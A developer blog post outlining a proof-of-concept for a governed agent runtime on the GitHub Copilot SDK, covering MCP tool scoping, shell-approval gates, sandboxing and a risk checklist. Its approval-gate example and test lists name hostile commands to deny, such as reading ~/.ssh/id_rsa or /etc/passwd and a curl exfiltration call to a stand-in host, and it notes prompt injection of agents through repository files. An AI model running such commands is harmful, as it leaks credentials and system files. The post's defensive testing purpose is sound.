Jangwook Kim

Posted on Jun 7 • Originally published at effloow.com

GitHub Copilot SDK: Governed Agent Runtime PoC

#githubcopilot #copilotsdk #aiagents #mcp

GitHub moved the Copilot SDK to general availability on June 2, 2026, and announced cloud and local sandboxes for GitHub Copilot in public preview the same day. That combination is more important than another "AI coding assistant" headline: it gives developer-tool teams a credible path to embed an agent runtime while separating tool access, approval policy, identity, and execution isolation.

This article is not a hands-on Copilot sandbox review. Effloow Lab did not authenticate to GitHub Copilot, create a real SDK session, run Copilot CLI, or start a cloud sandbox. The evidence here is narrower and explicit: official GitHub changelog/docs research, an npm registry check showing @github/copilot-sdk latest at 1.0.0, and a saved OpenAI API prompt harness that generated a synthetic implementation-risk matrix for a governed runtime. The lab artifact is saved at data/lab-runs/github-copilot-sdk-sandboxes-agent-runtime-poc-2026.md.

Use this as a PoC blueprint for deciding what to build and what to verify before you let an embedded agent inspect code, call MCP tools, run shell commands, or move execution into a cloud sandbox.

What You'll Build

The target PoC is a governed agent runtime for a developer-tool product. The user opens a web app, points the agent at a sample repository, and asks for a small engineering task such as "inspect this repo and summarize migration risks." The runtime should:

create a Copilot SDK session with a stable, auditable configuration;
expose only approved MCP tools;
limit filesystem access to a temporary workspace such as /tmp/agent-work;
require human approval before shell commands;
treat repository and issue contents as untrusted input;
optionally start a cloud session only when organization policy allows it;
log approvals, denials, tool calls, failures, and policy decisions.

GitHub's SDK announcement says the GA SDK provides programmatic access to the Copilot agent runtime for planning, tool invocation, file edits, streaming, and multi-turn sessions. GitHub's docs also show SDK setup across TypeScript, Python, Go, .NET, Rust, and Java. The npm check in this workflow confirmed @github/copilot-sdk exists with latest set to 1.0.0.

The missing part is not "can an agent answer a prompt?" The missing part is whether your product can make the agent governable enough for a buyer to trust.

Prerequisites

You need a GitHub Copilot entitlement or BYOK configuration that is valid for the SDK path you choose. GitHub's authentication docs describe several modes: an interactively signed-in GitHub user, OAuth GitHub App user tokens, environment-based tokens, and BYOK. Classic ghp_ personal access tokens are listed as unsupported in the SDK authentication docs; do not build your PoC around them.

For a TypeScript scaffold, the official getting-started docs use:

mkdir copilot-runtime-poc
cd copilot-runtime-poc
npm init -y --init-type module
npm install @github/copilot-sdk tsx

Expected package-level evidence from this Effloow run:

{
  "version": "1.0.0",
  "name": "@github/copilot-sdk",
  "dist-tags": {
    "latest": "1.0.0"
  }
}

Expected runtime behavior is [DATA NOT AVAILABLE] until you authenticate and run the SDK in your own environment. That distinction matters. A package install or docs-based scaffold does not prove that your organization policy, Copilot plan, MCP server, sandbox settings, or cloud-session entitlement will work.

Step 1: Define the Control Plane

Start with a control plane document before writing application code. For a buyer-facing PoC, this is the difference between "we embedded an agent" and "we know what the agent is allowed to do."

runtime:
  session_owner: authenticated_app_user
  default_execution: local
  cloud_execution: disabled_until_policy_allows
  repository_scope: sample_repository_only
tools:
  filesystem:
    type: mcp
    root: /tmp/agent-work
    access: read-write
  issue_reader:
    type: mcp
    access: read-only
  shell:
    enabled: approval_required
approval:
  shell_commands: human_required
  timeout_behavior: deny
logging:
  record_tool_calls: true
  record_approval_decisions: true
  redact_secrets: true

Expected output from this step is not a running agent. It is an approval-ready control contract. If a vendor cannot explain repository scope, tool scope, identity, approvals, and logs before demoing the agent, the PoC is not ready for a buyer.

Step 2: Create the Minimal SDK Session

GitHub's getting-started docs show a minimal TypeScript session with CopilotClient, createSession, and sendAndWait. Keep your first code path boring:

import { CopilotClient } from "@github/copilot-sdk";

async function main() {
  const client = new CopilotClient();

  const session = await client.createSession({
    model: "gpt-4.1"
  });

  const response = await session.sendAndWait({
    prompt: "Summarize the repository migration risks from the allowed workspace only."
  });

  console.log(response?.data.content);
  await client.stop();
}

main().catch((error) => {
  console.error(error);
  process.exit(1);
});

Expected result in a fully configured environment: a model response from the Copilot session. Expected result in many first-time environments: authentication, entitlement, policy, or runtime errors. Do not hide those errors in the PoC report. They are buyer-relevant evidence.

If cloud session creation returns a policy-related error, GitHub's cloud-session docs show handling a surfaced "policy_blocked" reason rather than retrying blindly. In a serious PoC, policy denial should be treated as a successful governance signal, not as an implementation failure.

Step 3: Add MCP Tools With Explicit Scope

The SDK docs describe MCP server configuration and tool filtering. The MCP docs show a filesystem example using @modelcontextprotocol/server-filesystem and a tools field that can allow all tools, allow specific tools, or disable tools with an empty list.

For a governed PoC, avoid tools: ["*"] unless the MCP server itself exposes only the tiny capability surface you want. Prefer named tools when available:

import { CopilotClient } from "@github/copilot-sdk";

const client = new CopilotClient();

const session = await client.createSession({
  mcpServers: {
    filesystem: {
      type: "local",
      command: "npx",
      args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp/agent-work"],
      tools: ["read_file", "write_file", "list_directory"]
    },
    issueReader: {
      type: "local",
      command: "node",
      args: ["./mcp-issue-reader-readonly.js"],
      tools: ["get_issue", "list_issues"]
    }
  }
});

Expected validation:

# Should succeed
agent reads /tmp/agent-work/README.md

# Should fail
agent reads /etc/passwd
agent writes issue metadata
agent calls an unregistered MCP tool

The article caveat is blunt: this workflow did not run a live Copilot SDK session, so exact Copilot mediation behavior is [DATA NOT AVAILABLE]. The implementation requirement is still valid: if your app exposes MCP tools, the approved surface must be inspectable before the session starts and testable after the session runs.

Step 4: Put Approval Before Shell Execution

GitHub's Copilot CLI docs cover allowing and denying tool use, and the SDK docs include hook surfaces such as pre-tool-use hooks. For a product PoC, shell execution should begin disabled or approval-gated.

The approval payload should show:

command;
working directory;
affected file path or resource, when known;
reason the agent requested it;
expected effect;
timeout behavior.

A mock approval gate can start like this:

type ShellRequest = {
  command: string;
  cwd: string;
  reason: string;
};

async function approveShell(request: ShellRequest): Promise<boolean> {
  if (!request.cwd.startsWith("/tmp/agent-work")) return false;
  if (request.command.includes("curl ")) return false;
  if (request.command.includes("cat ~/.ssh")) return false;

  return await showHumanApprovalDialog(request);
}

Expected validation:

approve: npm test
deny: cat ~/.ssh/id_rsa
deny: curl https://example.invalid/exfiltrate
deny: command approval timeout

The OpenAI API harness saved for this article flagged command chaining, redirects, environment reads, and file writes outside allowed paths as validation cases. That is not a Copilot product finding. It is a synthetic risk checklist that a vendor should turn into actual tests.

Step 5: Choose Local or Cloud Sandbox Deliberately

GitHub says cloud and local sandboxes for Copilot are in public preview and subject to change. GitHub's sandbox overview describes local sandboxing as restricted execution on the developer's machine and cloud sandboxing as isolated, ephemeral Linux environments hosted by GitHub. The same docs say sandboxes currently apply to Copilot CLI sessions, with cloud sandboxes also usable for sessions in the GitHub Copilot app.

Local sandbox controls are configured through the /sandbox command in Copilot CLI, with settings for filesystem, network, and general behavior. GitHub's docs mention settings stored under a sandbox key in the Copilot CLI configuration directory.

Cloud sandboxing is a buyer-sensitive decision because it changes execution location and billing. GitHub's billing docs state that billing applies to cloud sandboxing only, while local sandboxing is included in the standard Copilot seat. The same billing page says preview-era cloud use receives a monthly entitlement for eligible accounts in June 2026, and usage beyond entitlement is billed.

Use this decision table:

Execution Mode	Use When	Governance Check	PoC Caveat
Local session	Developer machine can safely host the task	Filesystem, network, keychain, and shell policy	Local machine state can leak into tests if not controlled
Cloud session	You need isolated hosted compute or cross-device continuity	Org policy, entitlement, repository context, budget	Preview behavior can change
Start disabled	Buyer has not approved cloud execution yet	Fail closed on missing policy	May reduce demo convenience but improves trust

For cloud sessions, GitHub's SDK docs recommend repository context and note that organization policies must allow remote control and viewing from cloud surfaces. Treat missing or unreadable policy as deny.

Step 6: Verify the Runtime With a Risk Matrix

Effloow Lab used scripts/openai-lab-run.py with a safe, synthetic prompt to produce a governance risk matrix. The prompt used no confidential data and asked the model not to invent product behavior, prices, benchmarks, quotes, or hands-on results.

The useful output was not code. It was a checklist of failure signals:

agent can read outside the sample repository;
MCP tools beyond the approved list are visible;
filesystem server reaches outside /tmp/agent-work;
read-only issue tool can mutate data;
shell command runs without approval;
cloud session starts when policy is denied or missing;
actions occur under an unexpected identity;
logs omit tool calls or approval decisions;
repository content can prompt-inject the agent into bypassing controls;
secrets appear in prompt, environment, tool output, or logs.

That list should become your PoC test plan. A credible implementation report should include pass/fail results for each item. If a control cannot be verified, write [DATA NOT AVAILABLE] instead of replacing evidence with confidence.

Verify It Works

A buyer-ready Copilot SDK runtime PoC should produce these artifacts:

runtime-config.yaml
mcp-tool-inventory.json
approval-flow-screenshots-or-logs.txt
sandbox-policy-notes.md
cloud-session-policy-check.md
test-results.md
limitations.md

Minimum acceptance criteria:

The SDK session starts only under an approved authentication mode.
MCP tool inventory is visible before the model can call tools.
Filesystem access is constrained to the declared workspace.
Shell commands require approval and denial is enforced.
Cloud execution is disabled unless policy and billing checks pass.
Logs show actor, tool, target, decision, and outcome.
Prompt-injection fixtures in repo files do not bypass controls.

If you cannot satisfy those seven items, keep the project in pilot status. The agent may still be useful, but it is not ready to be sold as governed automation.

Troubleshooting FAQ

Q: Is the Copilot SDK production-ready?

GitHub announced the Copilot SDK as generally available on June 2, 2026. That supports production planning, but it does not automatically validate your product's tool policy, auth model, logging, or sandbox behavior.

Q: Are Copilot sandboxes generally available?

No. GitHub announced cloud and local sandboxes for Copilot as public preview on June 2, 2026, and GitHub Docs mark them as subject to change.

Q: Can I use MCP servers with the SDK?

GitHub Docs show SDK MCP server configuration and tool filtering. The safe product pattern is to expose only required tools, avoid broad wildcard access when possible, and test both allowed and forbidden tool calls.

Q: Does this article prove GitHub Copilot can run my exact agent workflow?

No. This article proves a bounded research and planning workflow: official-source verification, npm package availability, and an OpenAI-backed synthetic risk harness. Real Copilot runtime behavior requires authenticated testing in your environment.

Verdict

Bottom Line

The Copilot SDK GA release makes embedded agent runtimes worth a serious PoC, but the value is in the governance wrapper: MCP scoping, approval hooks, sandbox policy, cloud-session controls, and evidence logs. Treat sandbox previews and unverified runtime behavior as test targets, not assumptions.

For developer-tool vendors, the opportunity is clear. You no longer need to pitch a generic chatbot bolted onto an app. You can show a controlled agent surface with explicit tools, approvals, execution boundaries, and failure evidence. That is the kind of proof technical buyers can evaluate.

For Effloow-style technical content, this is also the standard: source-backed claims, small lab artifacts, clear limitations, and no invented hands-on story.

DEV Community